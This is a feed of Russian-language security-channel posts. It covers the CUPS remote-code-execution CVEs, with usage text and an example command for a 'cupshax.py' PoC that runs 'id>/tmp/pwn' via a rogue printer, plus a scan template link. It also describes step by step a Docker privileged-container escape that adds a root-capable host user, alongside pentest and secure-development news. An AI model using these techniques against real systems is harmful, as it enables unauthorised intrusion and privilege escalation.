This media is not supported in your browser
VIEW IN TELEGRAM
#unix #RCE #CVE
CVE-2024-47176 CVE-2024-47076 CVE-2024-47175 CVE-2024-47177
Вчера вечером интернет наводнился новостью о новой баге в UNIX системах, которая позволяет выполнить неавторизованный RCE. Но были особые условия, к примеру что должна быть очередь на печать. В прикрепленном видосе демонстрируется PoC.
Авторы эксплойта изучили коммит в OpenPrinting CUPS, в котором была исправлена бага и написали эксплойт. Он использует dns-sd обнаружение принтера, требуя, чтобы цель могла получить широковещательное сообщение, т.е. находилась в той же сети.
usage: cupshax.py [-h] [--name NAME] --ip IP [--command COMMAND] [--port PORT]
A script for executing commands remotely
options:
-h, --help show this help message and exit
--name NAME The name to use (default: RCE Printer)
--ip IP The IP address of the machine running this script
--command COMMAND The command to execute (default: 'touch /tmp/pwn')
--port PORT The port to connect on (default: 8631)
python cupshax.py --name "Print to PDF (Color)" \
--command "id>/tmp/pwn" \
--ip 10.0.0.3
Please open Telegram to view this post
VIEW IN TELEGRAM
11👍22🔥7⚡2 2
Ставьте плюс в комментах кто уже на underconf.ru и кто приедет ещё
😁6👍2
Forwarded from BugXplorer (j b)
Scan for CVE-2024-47176 (CUPS - Remote Code Execution) with Nuclei
Vulnerability discovery: https://www.evilsocket.net/2024/09/26/Attacking-UNIX-systems-via-CUPS-Part-I/
Nuclei Template: https://cloud.projectdiscovery.io/?template=CVE-2024-47176
Source: https://x.com/pdnuclei/status/1840195177098453308
Vulnerability discovery: https://www.evilsocket.net/2024/09/26/Attacking-UNIX-systems-via-CUPS-Part-I/
Nuclei Template: https://cloud.projectdiscovery.io/?template=CVE-2024-47176
Source: https://x.com/pdnuclei/status/1840195177098453308
🔥14👍3 2⚡1
Похек
Ставьте плюс в комментах кто уже на underconf.ru и кто приедет ещё
Теперь и я на точке сбора
🔥4😁3
Underconf в Холидей ИНН
#underconf
Очень атмосферная конференция, с крутыми спецами на площадке!
Могу ещё добавить, что тут классные стенды, есть локпик, Half-Life, CS 1.6, WarHammer на ЭЛТ Мониторах))
underconf.ru
🌚 @poxek
#underconf
Очень атмосферная конференция, с крутыми спецами на площадке!
Могу ещё добавить, что тут классные стенды, есть локпик, Half-Life, CS 1.6, WarHammer на ЭЛТ Мониторах))
underconf.ru
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
😁12 3⚡1🔥1
#docker #контейнер #k8s
Проблемы с безопасностью
Типичные проблемы, связанные с информационной безопасностью контейнеров:
Уязвимые компоненты. Когда вы деплоите и собираете контейнер с уязвимыми компонентами, то они никуда не денутся и всегда будут в нём присутствовать.
Ошибки конфигурации. Когда в среде выполнения контейнеров или в самих контейнерах допущены ошибки при конфигурировании, злоумышленник может этим воспользоваться.
Наличие root-пользователя в контейнере. Эта проблема может звучать немного по-детски. Но это бич многих компаний — часто у них запускаются продукты от привилегированного пользователя внутри контейнеров. Тоже запускаете свои приложения в контейнере под root’ом? Мы расскажем, почему так однозначно не стоит делать.
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥16👍4
Безопасность на автопилоте: взламываем авиакомпанию, чтобы летать бесплатно
#бастион #авиа
От себя добавлю, что статья большая, подробная и поэтому максимально рекомендую к прочтению!
Представьте: вы заказываете пентест, ожидая найти пару-тройку мелких багов, а в итоге получаете отчет, от которого волосы встают дыбом даже у бывалых айтишников. Знакомая ситуация? Нет? Пристегните ремни — сейчас будет турбулентность.
Сегодня у нас в блоге горячая история о том, как одна авиакомпания чуть не отправилась на небеса кибербезопасности. В этой статье мы разберем, как наша команда прошла путь от невинной SSRF-уязвимости до полного контроля над доменом заказчика. Спойлер: по пути мы нашли возможность генерировать бесконечные промокоды, отправлять SMS от имени компании и даже заглянули в святая святых — систему 1С.
❤️ Временно убрали публикацию
🌚 @poxek | 📺 RuTube | 🌚 Мерч Похек
#бастион #авиа
От себя добавлю, что статья большая, подробная и поэтому максимально рекомендую к прочтению!
Представьте: вы заказываете пентест, ожидая найти пару-тройку мелких багов, а в итоге получаете отчет, от которого волосы встают дыбом даже у бывалых айтишников. Знакомая ситуация? Нет? Пристегните ремни — сейчас будет турбулентность.
Сегодня у нас в блоге горячая история о том, как одна авиакомпания чуть не отправилась на небеса кибербезопасности. В этой статье мы разберем, как наша команда прошла путь от невинной SSRF-уязвимости до полного контроля над доменом заказчика. Спойлер: по пути мы нашли возможность генерировать бесконечные промокоды, отправлять SMS от имени компании и даже заглянули в святая святых — систему 1С.
Please open Telegram to view this post
VIEW IN TELEGRAM
👍27🔥10 6
Forwarded from КИБЕР МЕДИА
Burp Suite — это широко известный инструмент для пентестеров и багхантеров, который позволяет проводить глубокий анализ безопасности приложений. Он содержит массу функций и возможностей, но вместе с тем может представлять и серьезные вызовы.
Please open Telegram to view this post
VIEW IN TELEGRAM
👍11 5😁3
Docker Privilege Escalation
#docker #privesc
Прикольная техника, почему-то раньше о ней не задумывался. Начал вроде бы обычное, монтируем в привилегированный контейнер файловую систему. Далее через chroot создаём нового пользователя в хостовой файловой системе, но от имени рута нашего контейнера. Устанавливаем пароль. Далее чтобы добавить рута, нам необходимо создать группу sudo, а чтобы её создать надо установить sudo внутрь контейнера. Далее создаём группу sudo, добавляем в неё нашего нового пользователя. Заходим на хостовую систему и спокойно авторизуемся под новым пользователем с помощью su <user>. Добавляем себя в sudoers и вауля. Всё готово :D
➡️ Читать понятнее подробнее
🌚 @poxek | 📺 RuTube | 🌚 Мерч Похек
#docker #privesc
Прикольная техника, почему-то раньше о ней не задумывался. Начал вроде бы обычное, монтируем в привилегированный контейнер файловую систему. Далее через chroot создаём нового пользователя в хостовой файловой системе, но от имени рута нашего контейнера. Устанавливаем пароль. Далее чтобы добавить рута, нам необходимо создать группу sudo, а чтобы её создать надо установить sudo внутрь контейнера. Далее создаём группу sudo, добавляем в неё нашего нового пользователя. Заходим на хостовую систему и спокойно авторизуемся под новым пользователем с помощью su <user>. Добавляем себя в sudoers и вауля. Всё готово :D
Please open Telegram to view this post
VIEW IN TELEGRAM
😁12👍2
Forwarded from AKTIV.CONSULTING
Недавно мы рассматривали, в каких ситуациях организациям стоит задуматься о внедрении процесса безопасной разработки программного обеспечения (БРПО). Сегодня давайте обсудим, нужна ли БРПО вендорам коммерческого ПО.
Если вендор коммерческого ПО задумывается о необходимости внедрения подходов безопасной разработки и не находит однозначного ответа, рекомендуем ответить на следующие вопросы:
Если хотя бы на 2 вопроса вы ответили положительно, рекомендуем задуматься о внедрении процесса безопасной разработки.
#БРПО #DevSecOps
Please open Telegram to view this post
VIEW IN TELEGRAM
👍6 2